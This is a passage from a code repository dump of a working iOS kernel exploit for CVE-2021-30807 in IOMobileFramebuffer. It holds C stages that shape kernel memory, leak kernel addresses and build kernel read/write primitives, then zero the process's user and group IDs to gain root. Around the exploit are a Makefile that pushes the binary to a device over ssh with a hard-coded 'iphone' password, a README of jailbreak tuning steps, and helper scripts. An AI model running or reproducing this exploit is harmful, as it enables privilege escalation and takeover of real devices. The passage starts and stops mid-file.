Only spray surfaces here 1005 | * so when we do stage2, the leaked IOSurfaceRootUserClient + other 1006 | * pointers will correspond to this one */ 1007 | int mididx = iosruc_hole_fillers->len / 2; 1008 | int spray_surface_id = 0; 1009 | 1010 | struct iosruc_hole_filler *mid = iosruc_hole_fillers->items[mididx]; 1011 | 1012 | /* We don't want to trigger a reallocation from 0x10000 --> 1013 | * 0x20000 bytes */ 1014 | while(spray_surface_id < 8191){ 1015 | spray_surface_id = create_surface(mid->iosruc); 1016 | 1017 | if(spray_surface_id == -1) 1018 | break; 1019 | 1020 | array_insert(mid->surface_ids, (void *)(uintptr_t)spray_surface_id); 1021 | } 1022 | 1023 | *iosruc_hole_fillersp = iosruc_hole_fillers; 1024 | *pipe_hole_fillersp = pipe_hole_fillers; 1025 | *anchor_alloc_kaddrp = anchor_alloc_kaddr; 1026 | 1027 | return true; 1028 | } 1029 | 1030 | static bool exploit_stage2(struct array *iosruc_hole_fillers, 1031 | uint64_t *iosr_kaddrp, uint64_t *iosruc_kaddrp, 1032 | uint64_t *iosc_array_kaddrp, 1033 | uint32_t *iosc_array_capacityp){ 1034 | /* Here we will leak the address of some IOSurfaceRootUserClient 1035 | * and the address of its IOSurfaceClient array. We do this by 1036 | * picking one of the IOSurfaceClient pointers in mid's surface client 1037 | * array to increment. We increment it 0x70 bytes and so that its 1038 | * IOSurface pointer now points to the IOSurfaceRootUserClient of the 1039 | * IOSurfaceClient it overlaps with. Then we can leak fields of that 1040 | * user client pointer with s_get_bulk_attachments. 
1041 | * 1042 | * We don't know if mid->inferred_client_array_kva *actually* 1043 | * corresponds to mid's IOSurfaceClient array, but it will correspond 1044 | * to one of the iosruc_hole_filler structures */ 1045 | 1046 | int mididx = iosruc_hole_fillers->len / 2; 1047 | struct iosruc_hole_filler *mid = iosruc_hole_fillers->items[mididx]; 1048 | 1049 | /* We allocated enough IOSurfaceClient objects so we should own all 1050 | * kalloc.160 elements for the pages near the end of the surface 1051 | * ID array. There's 102 elements per kalloc.160 page. Maybe we 1052 | * can get one that sits on the eigth-last page in its all_used list */ 1053 | int surface_idx = mid->surface_ids->len - (102 * 8); 1054 | int target_surface = (int)(uintptr_t)mid->surface_ids->items[surface_idx]; 1055 | 1056 | for(int i=1; ilen; i++){ 1057 | struct iosruc_hole_filler *ihf = iosruc_hole_fillers->items[i]; 1058 | 1059 | uint64_t current_client_array_guess = ihf->inferred_client_array_kva; 1060 | 1061 | /* We account for both KVA space layouts: 1062 | * [IOSurfaceClient array][pipe buffer][anchor alloc] 1063 | * and 1064 | * [pipe buffer][IOSurfaceClient array][anchor alloc] 1065 | */ 1066 | 1067 | uint64_t guessed_IOSurfaceClientp = current_client_array_guess + 1068 | (sizeof(void *) * target_surface); 1069 | 1070 | if(!increment32_n(guessed_IOSurfaceClientp, 0x70)){ 1071 | printf("%s: failed to increment guessed IOSurfaceClient" 1072 | " pointer at %#llx\n", __func__, 1073 | guessed_IOSurfaceClientp); 1074 | return false; 1075 | } 1076 | 1077 | /* Don't start doing this until we're more than a fourth of 1078 | * the way through the loop since we may hit an unmapped page 1079 | * before then */ 1080 | if(i > (iosruc_hole_fillers->len / 4)){ 1081 | if(!increment32_n(guessed_IOSurfaceClientp - 0x10000, 0x70)){ 1082 | printf("%s: failed to increment guessed IOSurfaceClient" 1083 | " pointer at %#llx\n", __func__, 1084 | guessed_IOSurfaceClientp); 1085 | return false; 1086 | } 1087 | } 1088 | 
} 1089 | 1090 | /* Leak the pointers we need */ 1091 | uint64_t bulk_in = (uint64_t)target_surface; 1092 | 1093 | uint8_t bulk_out[0x80]; 1094 | memset(bulk_out, 0, sizeof(bulk_out)); 1095 | size_t bulk_out_sz = sizeof(bulk_out); 1096 | 1097 | kern_return_t kret = IOConnectCallMethod(mid->iosruc, 28, &bulk_in, 1, 1098 | NULL, 0, NULL, 0, bulk_out, &bulk_out_sz); 1099 | 1100 | if(kret){ 1101 | printf("%s: s_get_bulk_attachments failed: %s\n", __func__, 1102 | mach_error_string(kret)); 1103 | return false; 1104 | } 1105 | 1106 | uint64_t iosr_kaddr = *(uint64_t *)(bulk_out + 0x1c); 1107 | uint64_t iosruc_kaddr = *(uint64_t *)(bulk_out + 0x3c) - 0xf8; 1108 | uint64_t iosc_array_kaddr = *(uint64_t *)(bulk_out + 0x54); 1109 | uint32_t iosc_array_capacity = *(uint32_t *)(bulk_out + 0x5c); 1110 | 1111 | *iosr_kaddrp = iosr_kaddr; 1112 | *iosruc_kaddrp = iosruc_kaddr; 1113 | *iosc_array_kaddrp = iosc_array_kaddr; 1114 | *iosc_array_capacityp = iosc_array_capacity; 1115 | 1116 | return true; 1117 | } 1118 | 1119 | static bool exploit_stage3(struct array *iosruc_hole_fillers, 1120 | struct array *pipe_hole_fillers, uint64_t anchor_alloc_kaddr, 1121 | uint64_t iosruc_kaddr, uint64_t iosc_array_kaddr, 1122 | uint32_t iosc_array_capacity, 1123 | struct pipe_hole_filler **krw_pipe_hole_fillerp, 1124 | io_connect_t *krw_iosrucp, int *krw_surface_idp){ 1125 | /* Create an artifical OOB IOSurfaceClient read with our 32-bit 1126 | * increment. 
But first we have to fix the IOSurfaceClient pointer 1127 | * in each pipe buffer now that we have a pointer to one of the 1128 | * IOSurfaceClient arrays we sprayed earlier */ 1129 | for(int i=0; i < pipe_hole_fillers->len; i++){ 1130 | struct pipe_hole_filler *phf = pipe_hole_fillers->items[i]; 1131 | uint8_t contents[0x10000]; 1132 | 1133 | if(read(phf->rfd, contents, sizeof(contents)) == -1){ 1134 | printf("%s: failed to read pipe %d: %s\n", __func__, i, 1135 | strerror(errno)); 1136 | return false; 1137 | } 1138 | 1139 | /* This is very likely to point to pipe buffer we control */ 1140 | *(uint64_t *)contents = iosc_array_kaddr + 0x10000 + sizeof(uint64_t); 1141 | 1142 | uint8_t *fake_IOSurfaceClient = contents + sizeof(uint64_t); 1143 | 1144 | *(uint64_t *)(fake_IOSurfaceClient + 0x40) = 1145 | iosc_array_kaddr + 0x10000 + sizeof(uint64_t) + 0xa0; 1146 | 1147 | uint8_t *fake_IOSurface = fake_IOSurfaceClient + 0xa0; 1148 | 1149 | *(uint64_t *)(fake_IOSurface + 0xc0) = 1150 | (iosc_array_kaddr + 0x10000 + sizeof(uint64_t) + 0xa0 + 0x400) - 0x14; 1151 | 1152 | /* Use the use count to encode the index into the pipe hole fillers 1153 | * so we know which one controls this IOSurface */ 1154 | *(uint32_t *)(fake_IOSurface + 0x400) = (0x4141 << 16) | i; 1155 | 1156 | if(write(phf->wfd, contents, sizeof(contents)) == -1){ 1157 | printf("%s: failed to write pipe %d: %s\n", __func__, i, 1158 | strerror(errno)); 1159 | return false; 1160 | } 1161 | } 1162 | 1163 | uint32_t times = 8193 - iosc_array_capacity; 1164 | 1165 | if(!increment32_n(iosruc_kaddr + 0x120, times)){ 1166 | printf("%s: failed to increase array capacity\n", __func__); 1167 | return false; 1168 | } 1169 | 1170 | /* Figure out which IOSurfaceRootUserClient corresponds to the 1171 | * IOSurfaceClient array that we can now OOB read from */ 1172 | struct pipe_hole_filler *krw_pipe_hole_filler = NULL; 1173 | io_connect_t krw_iosruc = IO_OBJECT_NULL; 1174 | 1175 | for(int i=0; i < iosruc_hole_fillers->len; i++){ 1176 | struct iosruc_hole_filler *ihf = 
iosruc_hole_fillers->items[i]; 1177 | io_connect_t iosruc = ihf->iosruc; 1178 | 1179 | uint64_t in = 8192; 1180 | uint64_t val = 0; 1181 | uint32_t outcnt = 1; 1182 | 1183 | kern_return_t kret = IOConnectCallScalarMethod(iosruc, 16, &in, 1, 1184 | &val, &outcnt); 1185 | 1186 | if(kret) 1187 | continue; 1188 | 1189 | if(((uint32_t)val >> 16) == 0x4141){ 1190 | krw_pipe_hole_filler = pipe_hole_fillers->items[val & 0xff]; 1191 | krw_iosruc = iosruc; 1192 | /* printf("%s: found corrupted IOSurfaceRootUserClient handle %#x\n", */ 1193 | /* __func__, krw_iosruc); */ 1194 | break; 1195 | } 1196 | } 1197 | 1198 | if(!krw_iosruc){ 1199 | printf("%s: failed, did not find corrupted iosruc\n", __func__); 1200 | return false; 1201 | } 1202 | 1203 | *krw_pipe_hole_fillerp = krw_pipe_hole_filler; 1204 | *krw_iosrucp = krw_iosruc; 1205 | *krw_surface_idp = 8192; 1206 | 1207 | return true; 1208 | } 1209 | 1210 | /* Kernel read/write constants */ 1211 | static io_connect_t g_krw_iosruc = IO_OBJECT_NULL; 1212 | static int g_krw_surface_pipe_read = 0, g_krw_surface_pipe_write = 0; 1213 | static uint32_t g_krw_surface_id = 0; 1214 | 1215 | static bool init_krw(io_connect_t krw_iosruc, 1216 | int krw_surface_pipe_read, int krw_surface_pipe_write, 1217 | uint32_t krw_surface_id){ 1218 | g_krw_iosruc = krw_iosruc; 1219 | g_krw_surface_pipe_read = krw_surface_pipe_read; 1220 | g_krw_surface_pipe_write = krw_surface_pipe_write; 1221 | g_krw_surface_id = krw_surface_id; 1222 | 1223 | return true; 1224 | } 1225 | 1226 | static bool kread32(uint64_t kaddr, uint32_t *out){ 1227 | if(!g_krw_iosruc){ 1228 | printf("%s: init_krw not called yet\n", __func__); 1229 | return false; 1230 | } 1231 | 1232 | uint8_t contents[0x10000]; 1233 | 1234 | if(read(g_krw_surface_pipe_read, contents, sizeof(contents)) == -1){ 1235 | printf("%s: read fail: %s\n", __func__, strerror(errno)); 1236 | return false; 1237 | } 1238 | 1239 | *(uint64_t *)(contents + 0x8 + 0xa0 + 0xc0) = kaddr - 0x14; 1240 | 1241 | 
if(write(g_krw_surface_pipe_write, contents, sizeof(contents)) == -1){ 1242 | printf("%s: write fail: %s\n", __func__, strerror(errno)); 1243 | return false; 1244 | } 1245 | 1246 | uint64_t in = g_krw_surface_id; 1247 | uint64_t val = 0; 1248 | uint32_t outcnt = 1; 1249 | 1250 | kern_return_t kret = IOConnectCallScalarMethod(g_krw_iosruc, 16, &in, 1, 1251 | &val, &outcnt); 1252 | 1253 | if(kret){ 1254 | printf("%s: failed reading from %#llx: %s\n", __func__, 1255 | kaddr, mach_error_string(kret)); 1256 | return false; 1257 | } 1258 | 1259 | *out = (uint32_t)val; 1260 | 1261 | return true; 1262 | } 1263 | 1264 | static bool kread64(uint64_t kaddr, uint64_t *out){ 1265 | uint32_t low, high; 1266 | 1267 | if(!kread32(kaddr, &low)) 1268 | return false; 1269 | 1270 | if(!kread32(kaddr + sizeof(uint32_t), &high)) 1271 | return false; 1272 | 1273 | *out = ((uint64_t)high << 32) | low; 1274 | 1275 | return true; 1276 | } 1277 | 1278 | static bool kwrite32(uint64_t kaddr, uint32_t val){ 1279 | if(!g_krw_iosruc){ 1280 | printf("%s: init_krw not called yet\n", __func__); 1281 | return false; 1282 | } 1283 | 1284 | uint8_t contents[0x10000]; 1285 | 1286 | if(read(g_krw_surface_pipe_read, contents, sizeof(contents)) == -1){ 1287 | printf("%s: read fail: %s\n", __func__, strerror(errno)); 1288 | return false; 1289 | } 1290 | 1291 | *(uint32_t *)(contents + 0x8 + 0xa0 + 0xb0) = 1; 1292 | *(uint64_t *)(contents + 0x8 + 0xa0 + 0xc0) = kaddr - 0x98; 1293 | 1294 | if(write(g_krw_surface_pipe_write, contents, sizeof(contents)) == -1){ 1295 | printf("%s: write fail: %s\n", __func__, strerror(errno)); 1296 | return false; 1297 | } 1298 | 1299 | uint64_t ins[] = { g_krw_surface_id, 0, val }; 1300 | 1301 | kern_return_t kret = IOConnectCallScalarMethod(g_krw_iosruc, 31, 1302 | ins, 3, NULL, NULL); 1303 | 1304 | if(kret){ 1305 | printf("%s: failed writing to %#llx: %s\n", __func__, kaddr, 1306 | mach_error_string(kret)); 1307 | return false; 1308 | } 1309 | 1310 | return true; 1311 | } 
1312 | 1313 | static bool kwrite64(uint64_t kaddr, uint64_t val){ 1314 | uint32_t low = (uint32_t)val; 1315 | uint32_t high = (uint32_t)(val >> 32); 1316 | 1317 | if(!kwrite32(kaddr, low)) 1318 | return false; 1319 | 1320 | if(!kwrite32(kaddr + sizeof(uint32_t), high)) 1321 | return false; 1322 | 1323 | return true; 1324 | } 1325 | 1326 | static bool post_exploit(uint64_t krw_iosruc_kaddr){ 1327 | uint64_t slid_iosruc_vtab; 1328 | 1329 | if(!kread64(krw_iosruc_kaddr, &slid_iosruc_vtab)){ 1330 | printf("%s: failed reading iosruc vtable\n", __func__); 1331 | return false; 1332 | } 1333 | 1334 | printf("%s: iosruc vtab is %#llx\n", __func__, slid_iosruc_vtab); 1335 | 1336 | slid_iosruc_vtab |= 0xffffff8000000000; 1337 | 1338 | /* XXX Don't have time to detect this automatically, manually set */ 1339 | bool is_new_style_kernel = true; 1340 | 1341 | uint64_t kslide, kernel_taskp; 1342 | 1343 | if(is_new_style_kernel){ 1344 | /* iPhone 8, 14.6 */ 1345 | kslide = slid_iosruc_vtab - 0xfffffff00789a388; 1346 | kernel_taskp = 0xfffffff007729030 + kslide; 1347 | } 1348 | else{ 1349 | /* iPhone SE (2016), 14.7 */ 1350 | kslide = slid_iosruc_vtab - 0xfffffff006e2fb10; 1351 | 1352 | uint64_t kernel_taskpp = slid_iosruc_vtab - 0x1980; 1353 | 1354 | if(!kread64(kernel_taskpp, &kernel_taskp)){ 1355 | printf("%s: old: failed reading kernel_task pointer\n", __func__); 1356 | return false; 1357 | } 1358 | } 1359 | 1360 | printf("%s: kernel slide is %#llx\n", __func__, kslide); 1361 | 1362 | uint64_t kernel_task; 1363 | 1364 | if(!kread64(kernel_taskp, &kernel_task)){ 1365 | printf("%s: failed reading kernel_task\n", __func__); 1366 | return false; 1367 | } 1368 | 1369 | kernel_task |= 0xffffff8000000000; 1370 | 1371 | printf("%s: kernel task struct is at %#llx\n", __func__, kernel_task); 1372 | 1373 | uint64_t kernel_proc; 1374 | 1375 | if(!kread64(kernel_task + 0x398, &kernel_proc)){ 1376 | printf("%s: failed reading kernel proc pointer\n", __func__); 1377 | return false; 1378 | } 
1379 | 1380 | kernel_proc |= 0xffffff8000000000; 1381 | 1382 | printf("%s: kernel proc struct is at %#llx\n", __func__, kernel_proc); 1383 | 1384 | uint64_t curproc; 1385 | 1386 | if(!kread64(kernel_proc + 0x8, &curproc)){ 1387 | printf("%s: failed reading kernproc->le_prev\n", __func__); 1388 | return false; 1389 | } 1390 | 1391 | curproc |= 0xffffff8000000000; 1392 | 1393 | uint64_t myproc; 1394 | 1395 | pid_t pid, mypid = getpid(); 1396 | 1397 | do { 1398 | if(!kread32(curproc + 0x68, (uint32_t *)&pid)){ 1399 | printf("%s: fail reading pid for proc struct %#llx\n", 1400 | __func__, curproc); 1401 | return false; 1402 | } 1403 | 1404 | myproc = curproc; 1405 | 1406 | if(!kread64(curproc + 0x8, &curproc)){ 1407 | printf("%s: failed reading next proc\n", __func__); 1408 | return false; 1409 | } 1410 | 1411 | curproc |= 0xffffff8000000000; 1412 | } while (pid != mypid); 1413 | 1414 | printf("%s: my proc struct is at %#llx\n", __func__, myproc); 1415 | 1416 | uint64_t mytask; 1417 | 1418 | if(!kread64(myproc + 0x10, &mytask)){ 1419 | printf("%s: could not read my task struct\n", __func__); 1420 | return false; 1421 | } 1422 | 1423 | mytask |= 0xffffff8000000000; 1424 | 1425 | printf("%s: my task struct is at %#llx\n", __func__, mytask); 1426 | 1427 | uint64_t mycreds; 1428 | 1429 | if(!kread64(myproc + 0xf0, &mycreds)){ 1430 | printf("%s: could not read my creds struct\n", __func__); 1431 | return false; 1432 | } 1433 | 1434 | mycreds |= 0xffffff8000000000; 1435 | 1436 | printf("%s: my creds are at %#llx\n", __func__, mycreds); 1437 | 1438 | uid_t uid = getuid(); 1439 | gid_t gid = getgid(); 1440 | 1441 | printf("%s: before: uid = %d, gid = %d\n", __func__, uid, gid); 1442 | 1443 | if(!kwrite32(mycreds + 0x18, 0)){ 1444 | printf("%s: failed zeroing uid\n", __func__); 1445 | return false; 1446 | } 1447 | 1448 | if(!kwrite32(mycreds + 0x1c, 0)){ 1449 | printf("%s: failed zeroing ruid\n", __func__); 1450 | return false; 1451 | } 1452 | 1453 | if(!kwrite32(mycreds + 
0x20, 0)){ 1454 | printf("%s: failed zeroing svuid\n", __func__); 1455 | return false; 1456 | } 1457 | 1458 | if(!kwrite32(mycreds + 0x68, 0)){ 1459 | printf("%s: failed zeroing rgid\n", __func__); 1460 | return false; 1461 | } 1462 | 1463 | if(!kwrite32(mycreds + 0x6c, 0)){ 1464 | printf("%s: failed zeroing svgid\n", __func__); 1465 | return false; 1466 | } 1467 | 1468 | uid = getuid(); 1469 | gid = getgid(); 1470 | 1471 | printf("%s: after: uid = %d, gid = %d\n", __func__, uid, gid); 1472 | 1473 | return true; 1474 | } 1475 | 1476 | static void exploit(void){ 1477 | uint64_t anchor_alloc_kaddr; 1478 | struct array *iosruc_hole_fillers; 1479 | struct array *pipe_hole_fillers; 1480 | 1481 | if(!exploit_stage1(&iosruc_hole_fillers, &pipe_hole_fillers, 1482 | &anchor_alloc_kaddr)){ 1483 | #ifdef SAMPLING_MEMORY 1484 | printf("%s: failed to sample kernel_map\n", __func__); 1485 | #else 1486 | printf("%s: failed to shape kva space\n", __func__); 1487 | #endif 1488 | return; 1489 | } 1490 | 1491 | #ifdef SAMPLING_MEMORY 1492 | return; 1493 | #endif 1494 | 1495 | printf("%s: Shaped KVA space\n", __func__); 1496 | 1497 | uint64_t iosr_kaddr, iosruc_kaddr, iosc_array_kaddr; 1498 | uint32_t iosc_array_capacity; 1499 | 1500 | if(!exploit_stage2(iosruc_hole_fillers, &iosr_kaddr, 1501 | &iosruc_kaddr, &iosc_array_kaddr, 1502 | &iosc_array_capacity)){ 1503 | printf("%s: stage2 failed, we will panic\n", __func__); 1504 | return; 1505 | } 1506 | 1507 | printf("%s: stage2 success\n", __func__); 1508 | 1509 | /* printf("%s: stage2 success\n" */ 1510 | /* "\tIOSurfaceRoot pointer: %#llx\n" */ 1511 | /* "\tIOSurfaceRootUserClient: %#llx\n" */ 1512 | /* "\t\tIOSurfaceClient array: %#llx\n" */ 1513 | /* "\t\tIOSurfaceClient array capacity: %d\n", */ 1514 | /* __func__, iosr_kaddr, iosruc_kaddr, iosc_array_kaddr, */ 1515 | /* iosc_array_capacity); */ 1516 | 1517 | struct pipe_hole_filler *krw_pipe_hole_filler; 1518 | io_connect_t krw_iosruc; 1519 | int krw_surface_id; 1520 | 1521 | 
if(!exploit_stage3(iosruc_hole_fillers, pipe_hole_fillers, 1522 | anchor_alloc_kaddr, iosruc_kaddr, iosc_array_kaddr, 1523 | iosc_array_capacity, &krw_pipe_hole_filler, 1524 | &krw_iosruc, &krw_surface_id)){ 1525 | printf("%s: stage3 failed, we will panic\n", __func__); 1526 | return; 1527 | } 1528 | 1529 | printf("%s: stage3 success\n", __func__); 1530 | 1531 | if(!init_krw(krw_iosruc, krw_pipe_hole_filler->rfd, 1532 | krw_pipe_hole_filler->wfd, krw_surface_id)){ 1533 | printf("%s: could not init kernel read/write prims\n", __func__); 1534 | return; 1535 | } 1536 | 1537 | printf("%s: kernel read/write prims set up\n" 1538 | " read kernel memory with kread32/64\n" 1539 | " write kernel memory with kwrite32/64\n", __func__); 1540 | 1541 | if(!post_exploit(iosruc_kaddr)){ 1542 | printf("%s: post exploit failed, we will panic\n", __func__); 1543 | return; 1544 | } 1545 | } 1546 | 1547 | static int increase_file_limit(void){ 1548 | struct rlimit rl = {0}; 1549 | 1550 | int err = getrlimit(RLIMIT_NOFILE, &rl); 1551 | 1552 | if(err){ 1553 | printf("%s: getrlimit: %s\n", __func__, strerror(errno)); 1554 | return err; 1555 | } 1556 | 1557 | rl.rlim_cur = OPEN_MAX; 1558 | rl.rlim_max = OPEN_MAX; 1559 | 1560 | err = setrlimit(RLIMIT_NOFILE, &rl); 1561 | 1562 | if(err){ 1563 | printf("%s: setrlimit: %s\n", __func__, strerror(errno)); 1564 | return err; 1565 | } 1566 | 1567 | return 0; 1568 | } 1569 | 1570 | int main(int argc, char **argv){ 1571 | if(increase_file_limit()){ 1572 | printf("Failed to increase file limits\n"); 1573 | return 1; 1574 | } 1575 | 1576 | struct utsname u; 1577 | uname(&u); 1578 | 1579 | printf("%s %s %s\n", u.release, u.version, u.machine); 1580 | 1581 | exploit(); 1582 | 1583 | for(;;); 1584 | return 0; 1585 | } 1586 | -------------------------------------------------------------------------------- /IOMobileFramebufferUserClient.h: -------------------------------------------------------------------------------- 1 | 2 | #ifndef 
IOMobileFramebufferUserClient_GUARD 3 | #define IOMobileFramebufferUserClient_GUARD 4 | 5 | void IOMobileFramebufferUserClient_tests(void); 6 | 7 | /* extern uint64_t g_mach_port_kaddr; */ 8 | extern void *g_test_port; 9 | extern bool g_dump_mqueue_logs; 10 | extern bool g_dump_peek_logs; 11 | extern bool g_log_queue_move_entry_gated; 12 | 13 | extern uint64_t g_right_port_kaddr; 14 | 15 | extern uint64_t g_osdata_kaddr; 16 | 17 | #endif 18 | 19 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2021 Justin Sherman 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 
22 | -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | SDK = $(shell xcrun --sdk iphoneos --show-sdk-path) 2 | CC = $(shell xcrun --sdk $(SDK) --find clang) 3 | CFLAGS = -g -arch arm64 -isysroot $(SDK) 4 | # make clang shut up about mach_port_destroy 5 | CFLAGS += -Wno-deprecated-declarations 6 | LDFLAGS = -framework CoreFoundation -framework IOKit 7 | 8 | ifeq ($(SAMPLING_MEMORY), 1) 9 | CFLAGS += -DSAMPLING_MEMORY 10 | endif 11 | 12 | #ios 15.4 check 13 | 14 | all : exploit 15 | 16 | array.o : array.c array.h 17 | $(CC) $(CFLAGS) array.c -c 18 | 19 | kernel_hooks.o : kernel_hooks.c kernel_hooks.h 20 | $(CC) $(CFLAGS) kernel_hooks.c -c 21 | 22 | exploit : array.o iokit.h kernel_hooks.o IOMobileFramebufferUserClient.c 23 | $(CC) $(CFLAGS) $(LDFLAGS) array.o kernel_hooks.o IOMobileFramebufferUserClient.c -o exploit 24 | ldid -Sent.xml ./exploit 25 | sshpass -p "iphone" rsync -sz -e 'ssh -p 2222' ./exploit ./ent.xml \ 26 | root@localhost:/var/root 27 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # iomfb Jailbreak Exploit for iOS 15.4 2 | 3 | Original Write up is here: [iomfb-exploit](https://jsherman212.github.io/2021/11/28/popping_ios14_with_iomfb.html) for [iOS 15.4 Jailbreak](https://taig9.com/jailbreak/ios-15-4/) 4 | 5 | Exploit for CVE-2021-30807. If you really want to build a jailbreak out 6 | of it, it will require tuning for your device and iOS version because I 7 | have no info leak to use for this. 8 | 9 | To tune for A11 and below, use pongo to load xnuspy and build with 10 | `SAMPLING_MEMORY=1 make -B`. This will enable a test that gathers 11 | the memory returned by `kernel_memory_allocate`, sorts those pointers, 12 | then spits out a range. 
You'll see something like this: 13 | 14 | ``` 15 | sample_kernel_map: 0xffffffe8ebe9c000 [0x10000 bytes from behind] 16 | sample_kernel_map: to add to alloc_averager: 17 | [0xffffffe8ce934000, 0xffffffe8ebf98000], 18 | ``` 19 | 20 | (just ignore the warnings it spits out) 21 | 22 | The test is meant to be ran 30 seconds after the device boots. 23 | 24 | Inside `alloc_averager.py` is a couple of samples I already ran for 25 | my phones. It takes the average of all the averages of each range. 26 | Create a "samples list" for your device and add the range to it. 27 | Repeat the test a couple times until you have 5-10 entries in that 28 | list. `alloc_averager.py` will report a success rate for the guess it 29 | generates based on the list. If you like the success rate, take the guess 30 | and replace the value for `GUESSED_OSDATA_BUFFER_PTR` at the top of 31 | `IOMobileFramebufferUserClient.c` with it. 32 | 33 | It is very important to not include outliers in this list. After running 34 | the test a couple times you'll likely run into a range that sticks 35 | out from the rest of the ranges you already have. 36 | 37 | You will need to find offsets for your device/version to run this test. 38 | 39 | First, to find `kernel_memory_allocate`, simply xref 40 | `kernel_memory_allocate: VM is not ready`. When you have the offset 41 | set `kma`'s value to it inside `install_kernel_memory_alloc_hook`. 42 | 43 | Second, to isolate the test from the other allocations XNU makes, 44 | I test for a specific return address. That address is inside 45 | `OSData::initWithCapacity`. You can easily find OSData's vtable 46 | by xrefing the string `"OSData"`. The first xref to that string 47 | will be in a function that has an xref to the vtable for OSData::MetaClass. 48 | Right above that vtable is OSData's vtable, and `OSData::initWithCapacity` 49 | is at `+0x78`. 
50 | 51 | 52 | Once you have `OSData::initWithCapacity`, find the only `BL` to 53 | `kernel_memory_allocate` and take the offset of the instruction *right below 54 | it*. Inside `kernel_hooks.c`, use that offset in the only if statement 55 | in the only function in that file. 56 | 57 | A12+ will need to use something like Correlium for Unc0ver and Taurine 58 | 59 | ## Mofified for iOS 15.4 Beta 2 Support 60 | I just modified the source to support **iOS 15.4 Beta 2**. Please contact me on [epeth0mus](https://twitter.com/epeth0mus) for more details 61 | 62 | ## Flow Diagram 63 | ```mermaid 64 | graph LR 65 | A[iomfb-exploit] --> B{A12 or higher} -- Yes --> C(OK) 66 | B{A12 or higher} -- No --> D(Go with Checkra1n) 67 | ``` 68 | > **Note:** The **Jailbreak Now** button is disabled if your device is not supported. 69 | -------------------------------------------------------------------------------- /alloc_averager.py: -------------------------------------------------------------------------------- 1 | #!/usr/local/bin/python3 2 | 3 | import statistics 4 | 5 | iphone8_kernel_map_samples = [ 6 | [0xffffffe8cee1c000, 0xffffffe8ec458000], 7 | [0xffffffe8cef78000, 0xffffffe8ec5b0000], 8 | [0xffffffe8ce9b4000, 0xffffffe8ebff4000], 9 | [0xffffffe8cef38000, 0xffffffe8ec570000], 10 | [0xffffffe8cead4000, 0xffffffe8ec10c000], 11 | [0xffffffe8ccdec000, 0xffffffe8ec378000], 12 | ] 13 | 14 | iphonese_kernel_map_samples = [ 15 | [0xfffffff9937e4000, 0xfffffff9aeedc000], 16 | [0xfffffff98352c000, 0xfffffff99ec24000], 17 | [0xfffffff981604000, 0xfffffff99ccfc000], 18 | [0xfffffff981a4c000, 0xfffffff99d144000], 19 | ] 20 | 21 | def average_allocs(alloc_list): 22 | ptr_mask = 0xffffffffffffc000 23 | avgs = list() 24 | 25 | for alloc_range in alloc_list: 26 | nallocs = 0 27 | total = 0 28 | npages = 0 29 | 30 | curpage = alloc_range[0] 31 | last = alloc_range[1] 32 | 33 | while curpage < last: 34 | total += curpage 35 | npages += 1 36 | curpage += 0x4000 37 | 38 | avg = (total // npages) 
& ptr_mask 39 | avgs.append(avg) 40 | 41 | # Page align down 42 | guess = int(statistics.mean(avgs)) & ptr_mask 43 | 44 | satisfied = 0 45 | not_satisfied = 0 46 | 47 | for alloc_range in alloc_list: 48 | first = alloc_range[0] 49 | last = alloc_range[1] 50 | 51 | if guess >= first and guess < last: 52 | satisfied += 1 53 | else: 54 | not_satisfied += 1 55 | 56 | right_chance = (satisfied / len(alloc_list)) * 100.0 57 | 58 | print("Guess 0x%x (%.02f%% chance (%d/%d) of being right)" % \ 59 | (guess, right_chance, satisfied, len(alloc_list))) 60 | 61 | return 62 | 63 | def main(): 64 | average_allocs(iphone8_kernel_map_samples) 65 | average_allocs(iphonese_kernel_map_samples) 66 | return 67 | 68 | main() 69 | -------------------------------------------------------------------------------- /array.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #include "array.h" 6 | 7 | static const int STARTING_CAPACITY = 1; 8 | 9 | int array_bsearch(struct array *a, const void *key, 10 | int (*compar)(const void *, const void *), void **result){ 11 | if(!a){ 12 | *result = NULL; 13 | return ARRAY_NULL; 14 | } 15 | 16 | if(array_empty(a)){ 17 | *result = NULL; 18 | return ARRAY_OK; 19 | } 20 | 21 | *result = bsearch(key, a->items, a->len, sizeof(void *), compar); 22 | 23 | if(!(*result)) 24 | return ARRAY_KEY_NOT_FOUND; 25 | 26 | return ARRAY_OK; 27 | } 28 | 29 | int array_clear(struct array *a){ 30 | free(a->items); 31 | a->items = NULL; 32 | 33 | a->len = 0; 34 | a->capacity = STARTING_CAPACITY; 35 | 36 | return ARRAY_OK; 37 | } 38 | 39 | int array_destroy(struct array **a){ 40 | array_clear(*a); 41 | 42 | free(*a); 43 | *a = NULL; 44 | 45 | return ARRAY_OK; 46 | } 47 | 48 | int array_empty(struct array *a){ 49 | return !a || a->len == 0; 50 | } 51 | 52 | int array_insert(struct array *a, void *elem){ 53 | if(!a) 54 | return ARRAY_NULL; 55 | 56 | if(!a->items) 57 | a->items = malloc(a->capacity * 
